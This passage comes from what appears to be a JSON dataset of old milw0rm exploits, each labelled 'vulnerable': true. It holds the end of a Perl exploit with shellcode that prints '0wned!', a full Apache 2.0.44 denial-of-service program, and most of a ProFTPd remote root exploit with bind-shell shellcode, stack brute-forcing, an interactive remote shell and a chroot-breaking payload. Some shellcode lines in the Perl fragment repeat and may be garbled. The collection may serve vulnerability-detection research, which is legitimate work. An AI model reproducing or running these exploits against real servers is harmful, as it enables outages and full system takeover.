\"[+] Connected\\n\";\n\nprint \"[+] Create Spl0it..\\n\";\n\n\n\n$sploit =\n\n\"\\xeb\\x6e\\x5e\\x29\\xc0\\x89\\x46\\x10\".\n\n\"\\x40\\x89\\xc3\\x89\\x46\\x0c\\x40\\x89\".\n\n\"\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\".\n\n\"\\x40\\x89\\xc3\\x89\\x46\\x0c\\x40\\x89\".\n\n\"\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\".\n\n\"\\x80\\x43\\xc6\\x46\\x10\\x10\\x88\\x46\".\n\n\"\\x08\\x31\\xc0\\x31\\xd2\\x89\\x46\\x18\".\n\n\"\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\".\n\n\"\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\".\n\n\"\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\".\n\n\"\\xb0\\x66\\xcd\\x80\\x89\\x56\\x0c\\x89\".\n\n\"\\x08\\x31\\xc0\\x31\\xd2\\x89\\x46\\x18\".\n\n\"\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\".\n\n\"\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\".\n\n\"\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\x86\".\n\n\"\\xc3\\xb0\\x3f\\x29\\xc9\\xcd\\x80\\xb0\".\n\n\"\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\".\n\n\"\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\".\n\n\"\\xb0\\x66\\xcd\\x80\\x89\\x56\\x0c\\x89\".\n\n\"\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\x86\".\n\n\"\\xc3\\xb0\\x3f\\x29\\xc9\\xcd\\x80\\xb0\".\n\n\"\\x3f\\x41\\xcd\\x80\\xb0\\x3f\\x41\\xcd\".\n\n\"\\x80\\x88\\x56\\x07\\x89\\x76\\x0c\\x87\".\n\n\"\\xf3\\x8d\\x4b\\x0c\\xb0\\x0b\\xcd\\x80\".\n\n\"\\xe8\\x8d\\xff\\xff\";\n\n\n\n\n\nprint \"[+] Sending Command Validation..\\n\";\n\nopen(OUT, \">$path\") or die(\"unable to open $path: $!\");\n\nopen(IN, $infile) or die(\"unable to open $infile: $!\");\n\n@directories=<IN>;\n\n\n\n$blah = \"GET $sploit HTTP/1.0\\nHost: $site\\nContent-length: 4\\nTEST\\n\";\n\n\n\nprint \"[+] Now attacking..\\n\";\n\n\n\nforeach (@directories) {\n\n       chomp;\n\n       print OUT \"$_ --> \";\n\n       s/ /%20/g;\n\n        my $repl = (qq(PUT /$_/test.txt $blah));\n\n\n\n       if ($repl =~ /not allowed/i) { print OUT \"Not Allowed\\n\"; }\n\n       elsif ($repl =~ /403.4 Forbidden: SSL required/i) { print OUT \"* 403.4 Forbidden: SSL required *\\n\"; }\n\n       elsif ($repl =~ /401 Unauthorized/i) { print OUT \"401 Unauthorized\\n\"; }\n\n       elsif ($repl =~ /Error 404/i) { print OUT \"Error 404\\n\"; }\n\n       elsif ($repl =~ /Write Access Forbidden/i) { print OUT \"Write Access Forbidden\\n\"; }\n\n       elsif ($repl =~ /Unauthorized due to ACL on resource/i) { print OUT \"Unauthorized due to ACL on resource\\n\"; }\n\n       else { print OUT \"*** SUCCESSFULL PUT ***\\n\"; }\n\n}\n\nclose($sock);\n\nprint \"[+] Domain: $site\\n\";\n\nprint \"[+] Path: $ARGV[2]\\n\";\n\nprint \"[+] 0wned!\\n\";\n\nexit();\n\n\n\n# milw0rm.com [2005-07-11]",
535        "vulnerable": true
536    },
537    {
538        "exploit_id": 11,
539        "content": "/******** th-apachedos.c ********************************************************\n\n* *\n\n* Remote Apache DoS exploit *\n\n* ------------------------- *\n\n* Written as a poc for the: *\n\n* \n\n* This program sends 8000000 \\n's to exploit the Apache memory leak. *\n\n* Works from scratch under Linux, as opposed to apache-massacre.c . *\n\n* \n\n* \n\n* Daniel Nystr\u00f6m <exce@netwinder.nu> *\n\n* \n\n* - www.telhack.tk - *\n\n* \n\n******************************************************** th-apachedos.c ********/\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n#include <errno.h>\n\n#include <sys/types.h>\n\n#include <netinet/in.h>\n\n#include <netdb.h>\n\n#include <sys/socket.h>\n\n\n\n\n\nint main(int argc, char *argv[])\n\n{\n\nint sockfd;\n\nint count;\n\nchar buffer[8000000];\n\nstruct sockaddr_in target;\n\nstruct hostent *he;\n\n\n\nif (argc != 3)\n\n{\n\nfprintf(stderr, \"\\nTH-apachedos.c - Apache <= 2.0.44 DoS exploit.\");\n\nfprintf(stderr, \"\\n----------------------------------------------\");\n\nfprintf(stderr, \"\\nUsage: %s <Target> <Port>\\n\\n\", argv[0]);\n\nexit(-1);\n\n}\n\n\n\nprintf(\"\\nTH-Apache DoS\\n\");\n\nprintf(\"-------------\\n\");\n\nprintf(\"-> Starting...\\n\"); \n\nprintf(\"->\\n\");\n\n\n\n// memset(buffer, '\\n', sizeof(buffer)); /* testing */\n\n\n\nfor (count = 0; count < 8000000;) \n\n{\n\nbuffer[count] = '\\r'; /* 0x0D */\n\ncount++;\n\nbuffer[count] = '\\n'; /* 0x0A */\n\ncount++;\n\n}\n\n\n\nif ((he=gethostbyname(argv[1])) == NULL)\n\n{\n\nherror(\"gethostbyname() failed \");\n\nexit(-1);\n\n}\n\n\n\nmemset(&target, 0, sizeof(target));\n\ntarget.sin_family = AF_INET;\n\ntarget.sin_port = htons(atoi(argv[2]));\n\ntarget.sin_addr = *((struct in_addr *)he->h_addr);\n\n\n\nprintf(\"-> Connecting to %s:%d...\\n\", inet_ntoa(target.sin_addr), atoi(argv[2]));\n\nprintf(\"->\\n\");\n\n\n\nif ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)\n\n{\n\nperror(\"socket() failed \");\n\nexit(-1);\n\n}\n\n\n\nif (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) < 0)\n\n{\n\nperror(\"connect() failed \");\n\nexit(-1);\n\n}\n\n\n\nprintf(\"-> Connected to %s:%d... Sending linefeeds...\\n\", inet_ntoa(target.sin_addr),\n\natoi(argv[2]));\n\nprintf(\"->\\n\");\n\n\n\nif (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer))\n\n{\n\nperror(\"send() failed \");\n\nexit(-1);\n\nclose(sockfd);\n\n} \n\n\n\n\n\nclose(sockfd);\n\n\n\nprintf(\"-> Finished smoothly, check hosts apache...\\n\\n\");\n\n}\n\n\n\n// milw0rm.com [2003-04-11]",
540        "vulnerable": true
541    },
542    {
543        "exploit_id": 110,
544        "content": "/*\n\nProFTPd 1.2.7 - 1.2.9rc2 remote r00t exploit\n\n--------------------------------------------\n\nBy Haggis\n\n\n\nThis exploit builds on the work of bkbll to\n\ncreate a working, brute-force remote exploit\n\nfor the \\n procesing bug in ProFTPd.\n\n\n\nTested on SuSE 8.0, 8.1 and RedHat 7.2/8.0\n\nit works quite well... the RedHat boxes\n\nworked on stack addresses in the 0xbffff2xx\n\nregion; the SuSE boxes were somewhat earlier\n\nin the stack space - around 0xbfffe8xx.\n\n\n\nThis is the only public version you'll see\n\nfrom Haggis@Doris - but it is very likely\n\nthat more powerful private versions will\n\nbe coded.\n\n\n\nAt present, this exploit breaks chroot (if\n\nany) and spawns a shell bound to port 4660.\n\n\n\n----------\n\n\n\nThis version is best run like so:\n\n\n\n./proft_put_down -t hostname -l localIP -U incoming\n\n\n\nwhere:\n\n\n\nhostname = target box\n\nlocalIP = your IP address\n\n\n\n-U incoming specifies that the exploit will attempt\n\nto create an 'incoming' directory on the remote ftp\n\nserver and work inside that. Without it, the shell-\n\ncode will probably not work properly. You have been\n\nwarned!\n\n\n\nIt is possible to use other credentials for logging\n\nin to remote servers; anonymous is the default.\n\n\n\nH.\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <ctype.h>\n\n#include <stdlib.h>\n\n#include <unistd.h>\n\n#include <errno.h>\n\n#include <netdb.h>\n\n#include <string.h>\n\n#include <signal.h>\n\n#include <stdarg.h>\n\n#include <sys/socket.h>\n\n#include <sys/types.h>\n\n#include <sys/time.h>\n\n#include <sys/select.h>\n\n#include <netinet/in.h>\n\n#include <arpa/inet.h>\n\n#include <linux/tcp.h>\n\n\n\n#define STACK_START 0xbfffef04\n\n#define STACK_END 0xbffff4f0\n\n#define FTP_PORT 21\n\n#define BINDSHELL_PORT 4660\n\n#define SIZE 1024\n\n#define EXPLOIT_BUF_SIZE 65535\n\n#define DEFAULT_USER \"anonymous\"\n\n#define DEFAULT_PASS \"ftp@\"\n\n#define FAILURE -1\n\n#define SUCCESS 0\n\n#define NORMAL_DOWNLOAD 1\n\n#define EXPLOIT_DOWNLOAD 2\n\n#define DOWNLOAD 3\n\n#define UPLOAD 4\n\n#define ACCEPT_TIMEOUT 5\n\n#define SLEEP_DELAY 19999999\n\n\n\n/*\n\nLeet 0-day HaggisCode (tm)\n\n*/\n\nchar shellcode[] =\n\n// setuid(0); setgid(0);\n\n\"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\xb0\\x2e\\xcd\\x80\"\n\n\n\n// fork() - parent terminates, killing proftpd and ending FTP\n\n// session. This leaves the child process as a daemon...\n\n\"\\x31\\xc0\\xb0\\x02\\xcd\\x80\\x89\\xc3\\x85\\xdb\\x74\\x08\\x31\"\n\n\"\\xdb\\x31\\xc0\\xb0\\x01\\xcd\\x80\"\n\n\n\n// Finally, bind a shell to port 4660.\n\n// This is a hacked version of the bindshell code by BigHawk.\n\n\"\\x31\\xdb\\xf7\\xe3\\xb0\\x66\\x53\\x43\\x53\\x43\\x53\\x89\\xe1\\x4b\\xcd\\x80\"\n\n\"\\x89\\xc7\\x52\\x66\\x68\\x12\\x34\\x43\\x66\\x53\\x89\\xe1\\xb0\\x10\\x50\\x51\"\n\n\"\\x57\\x89\\xe1\\xb0\\x66\\xcd\\x80\\xb0\\x66\\xb3\\x04\\xcd\\x80\\x50\\x50\\x57\"\n\n\"\\x89\\xe1\\x43\\xb0\\x66\\xcd\\x80\\x89\\xd9\\x89\\xc3\\xb0\\x3f\\x49\\xcd\\x80\"\n\n\"\\x41\\xe2\\xf8\\x51\\x68\\x2e\\x2f\\x61\\x61\\x89\\xe3\\x51\\x53\\x89\\xe1\\xb0\"\n\n\"\\x0b\\xcd\\x80\";\n\n\n\nint controlSock, passiveSock;\n\nint currentPassivePort=32769;\n\nint currentServerPort=31337;\n\nint exploitBufLen;\n\nint attemptNumber=0;\n\nint ftpPort=FTP_PORT;\n\nunsigned int stackWriteAddr, retAddr;\n\nchar serverBuf[SIZE];\n\nchar exploitBuf[EXPLOIT_BUF_SIZE];\n\nchar uploadPath[SIZE]=\"\";\n\nchar filename[SIZE*2];\n\nchar *server=NULL;\n\nchar *user=DEFAULT_USER;\n\nchar *pass=DEFAULT_PASS;\n\nchar *localIP=NULL;\n\nchar errorBuf[SIZE];\n\n\n\nint connect_to_server(int port);\n\nint login_to_server();\n\nint set_passive_mode(int mode);\n\nint set_ascii_mode();\n\nint set_path_and_filename();\n\nint check_for_linefeed();\n\nint check_status();\n\nint create_passive_server();\n\nint create_exploit_buffer();\n\nint upload_file();\n\nint download_file(int mode);\n\nvoid usage(char *s);\n\nint do_remote_shell(int shellSock);\n\nvoid status_bar(char *info);\n\nint timeout_accept(int s, struct sockaddr *sa, int *f);\n\nvoid my_send(int s, char *b, ...);\n\nvoid my_recv(int s);\n\nvoid my_sleep(int n);\n\nvoid doris_chroot_breaker();\n\n\n\nint main(int argc,char **argv)\n\n{\n\nint sleepMode=0;\n\nchar c;\n\nunsigned int stackStartAddr=STACK_START;\n\n\n\nif(argc<2) usage(argv[0]);\n\nwhile((c = getopt(argc, argv, \"t:u:p:l:U:sP:S:\"))!= EOF) {\n\nswitch (c) {\n\ncase 't':\n\nserver=optarg;\n\nbreak;\n\ncase 'u':\n\nuser=optarg;\n\nbreak;\n\ncase 'p':\n\npass=optarg;\n\nbreak;\n\ncase 'l':\n\nlocalIP=optarg;\n\nbreak;\n\ncase 's':\n\nsleepMode=1;\n\nbreak;\n\ncase 'U':\n\nstrncpy(uploadPath,optarg,SIZE);\n\nbreak;\n\ncase 'P':\n\nftpPort=atoi(optarg);\n\nbreak;\n\ncase 'S':\n\nstackStartAddr=strtoul(optarg, NULL, 16);\n\nbreak;\n\ndefault:\n\nusage(argv[0]);\n\nreturn 1;\n\n}\n\n}\n\nif(server==NULL || localIP==NULL)\n\nusage(argv[0]);\n\n\n\nprintf(\"proftpd 1.2.7 - 1.2.9rc2 remote r00t exploit\\n\");\n\nprintf(\" by Haggis (haggis@haggis.kicks-ass.net)\\n\");\n\n\n\ndoris_chroot_breaker();\n\nfor(stackWriteAddr=stackStartAddr; stackWriteAddr<STACK_END; stackWriteAddr+=4, attemptNumber++) {\n\n\n\nif(check_for_linefeed()==FAILURE)\n\ncontinue;\n\n\n\nretAddr=stackWriteAddr+200; // good enough for show business\n\n\n\nif((controlSock=connect_to_server(ftpPort))==FAILURE) {\n\nperror(\"\\n\\nFailing to connect to remote host\\n\");\n\nexit(1);\n\n}\n\n\n\nif(login_to_server()==FAILURE) {\n\nclose(controlSock);\n\nprintf(\"\\nERROR: Login failed.\\n\");\n\nexit(1);\n\n}\n\n\n\nif(set_passive_mode(UPLOAD)==FAILURE)\n\ngoto err;\n\nif(set_ascii_mode()==FAILURE)\n\ngoto err;\n\nif(set_path_and_filename()==FAILURE)\n\ngoto err;\n\n\n\n// create the buffer containing RET for this\n\n// brute-force iteration\n\ncreate_exploit_buffer();\n\n\n\nif(upload_file()==FAILURE)\n\ngoto err;\n\nclose(controlSock);\n\n\n\n// Connect again, then login, set ASCII mode and download the exploit file.\n\n// This will trigger the overflow; as a result, we've\n\n// corrupted the memory pool of this session and when we\n\n// download the file again, the stack area will be overwritten\n\n// and we control the saved EIP.\n\n\n\nif((controlSock=connect_to_server(ftpPort))<0) {\n\nperror(\"\\nFailed to connect to remote host\\n\");\n\nexit(1);\n\n}\n\n\n\nlogin_to_server(user,pass);\n\nset_path_and_filename();\n\nif(set_ascii_mode()==FAILURE)\n\ngoto err;\n\nif(set_passive_mode(DOWNLOAD)==FAILURE)\n\ngoto err;\n\nif(sleepMode)\n\nsleep(10);\n\nif(download_file(NORMAL_DOWNLOAD)==FAILURE)\n\ngoto err;\n\n\n\n// Finally, read the file again. This will trigger the stack\n\n// overwrite (NOT the overflow, that happened earlier). We could\n\n// control EIP at this point and r00t may be only heartbeat away...\n\n\n\nif(set_passive_mode(DOWNLOAD)==FAILURE)\n\ngoto err;\n\nif(download_file(EXPLOIT_DOWNLOAD)==FAILURE)\n\ngoto err;\n\nerr: \n\nclose(controlSock);\n\n}\n\n\n\n// This is only reached if the bruteforce fails.\n\n// delete the exploit files here\n\n\n\nprintf(\"\\n\\nNo r00t for you today I'm afraid.\\n\");\n\nexit(1);\n\n}\n\n\n\nvoid status_bar(char *info) {\n\nprintf(\"[ %20s ]-[ Stack: 0x%08x ]-[ RET: 0x%08x ]\\r\",info, stackWriteAddr,retAddr);\n\nfflush(stdout);\n\n}\n\n\n\nint set_path_and_filename()\n\n{\n\nstatus_bar(\"Setting filename\");\n\nif(strcmp(uploadPath,\"\")) {\n\nmy_send(controlSock, \"CWD %s\\r\\n\",uploadPath);\n\nmy_recv(controlSock);\n\n}\n\nsnprintf(filename,SIZE,\"proft_put_down-%d-%d.txt\",getpid(),attemptNumber);\n\nreturn SUCCESS;\n\n}\n\n\n\nint download_file(int mode)\n\n{\n\nint len, localServerSock, dataSock, bindShellSock;\n\nstruct sockaddr_in localServer;\n\n\n\nstatus_bar(\"Downloading\");\n\n// Ask the victim server to send us the exploit file\n\nmy_send(controlSock, \"RETR %s\\r\\n\", filename);\n\n\n\n// Create a listening server on our passive port to\n\n// receive the data\n\nmemset(&localServer,0,sizeof(localServer));\n\nlocalServerSock=create_passive_server();\n\nlen=sizeof(localServer);\n\n\n\n// Wait for a few seconds for the victim server to contact us...\n\nif((dataSock=timeout_accept(localServerSock,(struct sockaddr *)&localServer,&len))<0) {\n\nclose(localServerSock);\n\nreturn FAILURE;\n\n}\n\n\n\n// If the mode is EXPLOIT_DOWNLOAD, then this is the\n\n// second attempt at downloading... that means we might\n\n// have a shell waiting for us on the victim server, so\n\n// we try to connect to it\n\nif(mode==EXPLOIT_DOWNLOAD) {\n\nif((bindShellSock=connect_to_server(BINDSHELL_PORT))>=0) {\n\nprintf(\"\\nConnected! You are r00t...\\n\");\n\ndo_remote_shell(bindShellSock);\n\nprintf(\"\\nDid you have a nice time?\\n\");\n\nexit(0);\n\n} \n\nclose(dataSock);\n\nclose(localServerSock);\n\nreturn SUCCESS;\n\n}\n\n// If the mode is NORMAL_DOWNLOAD, then just clean up the\n\n// connection by receiving the file from the server; closing\n\n// the data and local server sockets, then read the confirmation\n\n// message from the control socket\n\nmy_recv(dataSock);\n\nclose(dataSock);\n\nclose(localServerSock);\n\nmy_recv(controlSock);\n\nreturn check_status();\n\n}\n\n\n\nint timeout_accept(int s, struct sockaddr *sa, int *f)\n\n{\n\nfd_set fdset;\n\nstruct timeval timeout = { ACCEPT_TIMEOUT, 0 }; // seconds\n\nint result;\n\n\n\nif(s<=0)\n\nreturn FAILURE;\n\nFD_ZERO(&fdset);\n\nFD_SET(s, &fdset);\n\n\n\nif((result=select(s+1, &fdset, 0, 0, &timeout))==0)\n\nreturn FAILURE;\n\nreturn accept(s,sa,f);\n\n}\n\n\n\nint set_passive_mode(int mode)\n\n{\n\nint portMSB, portLSB;\n\nint x1,x2,x3,x4;\n\nchar *ptr=localIP, *start;\n\n\n\nstatus_bar(\"Setting passive\");\n\nif(mode==DOWNLOAD) {\n\nif((++currentPassivePort) > 35000)\n\ncurrentPassivePort=32789;\n\n\n\nwhile(*(++ptr))\n\nif(*ptr=='.')\n\n*ptr=',';\n\nportMSB=(currentPassivePort >> 8 ) & 0xff;\n\nportLSB=currentPassivePort & 0xff;\n\nmy_send(controlSock, \"PORT %s,%d,%d\\r\\n\", localIP, portMSB, portLSB);\n\nmy_recv(controlSock);\n\nreturn check_status();\n\n} else { \n\nmy_send(controlSock, \"PASV\\r\\n\");\n\nmy_recv(controlSock);\n\nif(check_status()==FAILURE)\n\nreturn FAILURE;\n\nptr=serverBuf;\n\nwhile(*ptr && *ptr!='(')\n\nptr++;\n\nif(*ptr=='\\0')\n\nreturn FAILURE;\n\nstart=ptr+1;\n\nwhile(*ptr && *ptr!=')')\n\nptr++;\n\n*ptr=0;\n\nsscanf(start, \"%d,%d,%d,%d,%d,%d\",&x1, &x2, &x3, &x4, &portMSB, &portLSB);\n\ncurrentServerPort=(portMSB << 8) | portLSB;\n\n}\n\nreturn SUCCESS; \n\n}\n\n\n\nint connect_to_server(int port)\n\n{\n\nstruct sockaddr_in serverAddr;\n\nstruct hostent *host;\n\nint sock, tmp=1;\n\n\n\nstatus_bar(\"Connecting\");\n\nif((host=gethostbyname(server))==NULL)\n\nreturn FAILURE;\n\n\n\nif((sock=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP))<0)\n\nreturn FAILURE;\n\nbzero(&serverAddr,sizeof(struct sockaddr));\n\nserverAddr.sin_family=AF_INET;\n\nserverAddr.sin_port=htons(port);\n\nserverAddr.sin_addr=*((struct in_addr *)host->h_addr);\n\nsetsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (void *)&tmp, sizeof(tmp));\n\nif(connect(sock,(struct sockaddr *)&serverAddr,sizeof(struct sockaddr))<0) {\n\nclose(sock);\n\nreturn FAILURE;\n\n}\n\nreturn sock;\n\n}\n\n\n\nint check_status()\n\n{\n\nif(isdigit(serverBuf[0]) && serverBuf[0]!='5')\n\nreturn SUCCESS;\n\nelse\n\nreturn FAILURE;\n\n}\n\n\n\nint login_to_server()\n\n{\n\nstatus_bar(\"Logging in\");\n\nmy_recv(controlSock);\n\nmy_send(controlSock, \"USER %s\\r\\n\", user);\n\nmy_recv(controlSock);\n\nif(check_status()==FAILURE)\n\nreturn FAILURE;\n\n\n\nmy_send(controlSock, \"PASS %s\\r\\n\", pass); \n\nmy_recv(controlSock);\n\nreturn check_status();\n\n}\n\n\n\nint set_ascii_mode()\n\n{\n\nstatus_bar(\"Setting ASCII mode\");\n\nmy_send(controlSock, \"TYPE A\\r\\n\");\n\nmy_recv(controlSock);\n\nreturn check_status();\n\n}\n\n\n\n\n\nint upload_file()\n\n{\n\nint dataSock;\n\n\n\nstatus_bar(\"Uploading file\");\n\n\n\n// open up the data channel\n\nif((dataSock=connect_to_server(currentServerPort))==FAILURE)\n\nreturn FAILURE;\n\n\n\n// tell server we're gonna send some shiznitz\n\nmy_send(controlSock, \"STOR %s\\r\\n\", filename);\n\nmy_recv(controlSock);\n\nif(check_status()==FAILURE) {\n\nclose(dataSock);\n\nreturn FAILURE;\n\n}\n\n\n\n// send the exploit file to the victim server\n\nsend(dataSock, exploitBuf, exploitBufLen, 0);\n\nclose(dataSock);\n\n\n\n// make sure all went well\n\nmy_recv(controlSock);\n\nif(check_status()==FAILURE)\n\nreturn FAILURE;\n\nreturn SUCCESS;\n\n}\n\n\n\nint create_exploit_buffer()\n\n{\n\nint i;\n\nchar buf[41];\n\nunsigned int writeaddr=stackWriteAddr;\n\nunsigned int *ptr=(unsigned int *)(exploitBuf+3);\n\nunsigned int dummy=0x11111111;\n\nFILE *fp;\n\n\n\nstatus_bar(\"Make exploit buf\");\n\nexploitBufLen=1024;\n\nmemset(exploitBuf,0,EXPLOIT_BUF_SIZE);\n\nmemset(exploitBuf,0x90,512);\n\n*(ptr++)=writeaddr+28;\n\nfor(i=0;i<6;i++)\n\n*(ptr++)=retAddr;\n\n*(ptr++)=0;\n\nfor(i=0;i<2;i++)\n\n*(ptr++)=retAddr;\n\n\n\nmemcpy(exploitBuf+512-strlen(shellcode)-1,shellcode,strlen(shellcode));\n\nmemset(exploitBuf+512,'\\n',512);\n\n\n\nfor(i=0;i<96;i++) {\n\nmemset(buf,0,41);\n\nif(dummy==0x1111112e)\n\n// this sets session.d->outstrm to NULL which forces an early return\n\n// avoids crashing proftpd... on SuSE 8.0 anywayz...\n\nmemcpy(buf,\"\\n\\n\\n\\n\\n\\n\\n\\n\\x00\\x00\\x00\\x00\\n\\n\\n\\n\\n\\n\\n\\n\",20);\n\nelse if(dummy==0x11111166)\n\n// this is the same thing tailored for RH7.2\n\nmemcpy(buf,\"\\n\\n\\n\\n\\n\\n\\n\\n\\x72\\x00\\x00\\x00\\x00\\n\\n\\n\\n\\n\\n\\n\",20);\n\nelse\n\nmemset(buf,'\\n',20);\n\n\n\n// i used these dummy values to find the correct spot for\n\n// the session.d->outstrm pointer\n\n*(unsigned int *)(buf+20)=dummy;\n\n*(unsigned int *)(buf+24)=dummy;\n\n*(unsigned int *)(buf+28)=dummy;\n\n\n\n// this will become the address of an available chunk of memory\n\n// that is returned by new_block() in pool.c\n\n*(unsigned int *)(buf+32)=writeaddr;\n\n\n\n// this is what will be returned by palloc() in pool.c\n\n// palloc() is the function that calls new_block() and\n\n// provides the allocation interface for the pools system.\n\n*(unsigned int *)(buf+36)=writeaddr;\n\n\n\nmemcpy(exploitBuf+exploitBufLen,buf,40);\n\nexploitBufLen+=40;\n\ndummy++;\n\n}\n\nreturn SUCCESS;\n\n}\n\n\n\n\n\nint create_passive_server()\n\n{\n\nstruct sockaddr_in serverAddr;\n\nint on=1,sock;\n\n\n\nstatus_bar(\"Creating server\");\n\nsock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\n\nmemset(&serverAddr,0,sizeof(struct sockaddr_in));\n\nserverAddr.sin_port=htons(currentPassivePort);\n\nserverAddr.sin_family=AF_INET;\n\nserverAddr.sin_addr.s_addr=htonl(INADDR_ANY);\n\nsetsockopt(sock,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on));\n\nif(bind(sock,(struct sockaddr *)&serverAddr,sizeof(struct sockaddr))<0) {\n\nclose(sock);\n\nreturn FAILURE;\n\n}\n\nif(listen(sock,5)<0) {\n\nclose(sock);\n\nreturn FAILURE;\n\n}\n\nreturn sock;\n\n}\n\n\n\nvoid usage(char *exploitName)\n\n{\n\nprintf(\"proftpd 1.2.7 - 1.2.9rc2 remote root exploit\\n\");\n\nprintf(\" based on code by bkbll (bkbll@cnhonker.net)\\n\");\n\nprintf(\" by Haggis (haggis@haggis.kicks-ass.net)\\n\");\n\nprintf(\"--------------------------------------------------------------\\n\");\n\nprintf(\"Usage: %s -t host -l ip [options]\\n\",exploitName);\n\nprintf(\"Arguments:\\n\");\n\nprintf(\" -t <host> host to attack\\n\");\n\nprintf(\" -u <username> [anonymous]\\n\");\n\nprintf(\" -p <password> [ftp@microsoft.com]\\n\");\n\nprintf(\" -l <local ip address> interface to bind to\\n\");\n\nprintf(\" -s sleep for 10secs to allow GDB attach\\n\");\n\nprintf(\" -U <path> specify upload path, eg. /incoming\\n\");\n\nprintf(\" -P <port> port number of remote proftpd server\\n\");\n\nprintf(\" -S <address> start at <address> when bruteforcing\\n\");\n\nexit(0);\n\n}\n\n\n\n\n\nint do_remote_shell(int shellSock)\n\n{\n\nfd_set rfds;\n\nchar buf[1024];\n\nint retval, r=1;\n\n\n\ndo {\n\nFD_ZERO(&rfds);\n\nFD_SET(0, &rfds);\n\nFD_SET(shellSock, &rfds);\n\nretval=select(shellSock+1, &rfds, NULL, NULL, NULL);\n\nif(retval) {\n\nif(FD_ISSET(shellSock, &rfds)) {\n\nbuf[(r=recv(shellSock, buf, sizeof(buf)-1,0))]='\\0'; // lol\n\nprintf(\"%s\", buf);fflush(stdout);\n\n}\n\nif(FD_ISSET(0, &rfds)) {\n\nbuf[(r=read(0, buf, sizeof(buf)-1))]='\\0'; // lmfao\n\nsend(shellSock, buf, strlen(buf), 0);\n\n}\n\n}\n\n} while(retval && r); // loop until connection terminates\n\nreturn SUCCESS;\n\n}\n\n\n\n\n\nint check_for_linefeed()\n\n{\n\nchar *ptr=(char *)&stackWriteAddr;\n\nint i=4;\n\n\n\nfor(;i;i--)\n\nif(*(ptr++)=='\\n')\n\nreturn FAILURE;\n\nreturn SUCCESS;\n\n}\n\n\n\n// Handy little function to send formattable data down a socket.\n\nvoid my_send(int s, char *b, ...) {\n\nva_list ap;\n\nchar *buf;\n\n\n\nmy_sleep(SLEEP_DELAY);\n\nva_start(ap,b);\n\nvasprintf(&buf,b,ap);\n\nsend(s,buf,strlen(buf),0);\n\nva_end(ap);\n\nfree(buf);\n\n}\n\n\n\n// Another handy function to read data from a socket.\n\nvoid my_recv(int s) {\n\nint len;\n\n\n\nmy_sleep(SLEEP_DELAY);\n\nmemset(serverBuf, 0, SIZE);\n\nlen=recv(s, serverBuf, SIZE-1, 0);\n\nserverBuf[len]=0;\n\n}\n\n\n\nvoid doris_chroot_breaker() {\n\nchar haggis_magic_buffer[]=\n\n\"\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x02\\x00\\x03\\x00\\x01\\x00\\x00\\x00\\x80\\x80\\x04\\x08\\x34\\x00\\x00\\x00\"\n\n\"\\xa0\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x02\\x00\\x28\\x00\"\n\n\"\\x09\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x04\\x08\"\n\n\"\\x00\\x80\\x04\\x08\\x20\\x01\\x00\\x00\\x20\\x01\\x00\\x00\\x05\\x00\\x00\\x00\"\n\n\"\\x00\\x10\\x00\\x00\\x01\\x00\\x00\\x00\\x20\\x01\\x00\\x00\\x20\\x91\\x04\\x08\"\n\n\"\\x20\\x91\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\"\n\n\"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x55\\x89\\xe5\\x83\\xec\\x6c\\x57\\x56\\x53\\x8d\\x45\\xa0\\x8d\\x7d\\xa0\\xbe\"\n\n\"\\xc0\\x80\\x04\\x08\\xfc\\xb9\\x17\\x00\\x00\\x00\\xf3\\xa5\\x66\\xa5\\xa4\\x8d\"\n\n\"\\x45\\xa0\\x89\\x45\\x9c\\x8b\\x5d\\x9c\\xff\\xd3\\x8d\\x65\\x88\\x5b\\x5e\\x5f\"\n\n\"\\x89\\xec\\x5d\\xc3\\x8d\\xb6\\x00\\x00\\x00\\x00\\x8d\\xbf\\x00\\x00\\x00\\x00\"\n\n\"\\x31\\xc0\\x31\\xdb\\x40\\x50\\x89\\xe1\\x66\\xbb\\x73\\x68\\x53\\x89\\xe3\\xb0\"\n\n\"\\x27\\xcd\\x80\\x31\\xc0\\x89\\xe3\\xb0\\x3d\\xcd\\x80\\x31\\xc9\\xb1\\x0a\\x31\"\n\n\"\\xc0\\x31\\xdb\\x66\\xbb\\x2e\\x2e\\x53\\x89\\xe3\\xb0\\x0c\\xcd\\x80\\x49\\x85\"\n\n\"\\xc9\\x75\\xec\\x31\\xc0\\x31\\xdb\\xb3\\x2e\\x53\\x89\\xe3\\xb0\\x3d\\xcd\\x80\"\n\n\"\\x31\\xd2\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\"\n\n\"\\x53\\x89\\xe1\\x31\\xc0\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80\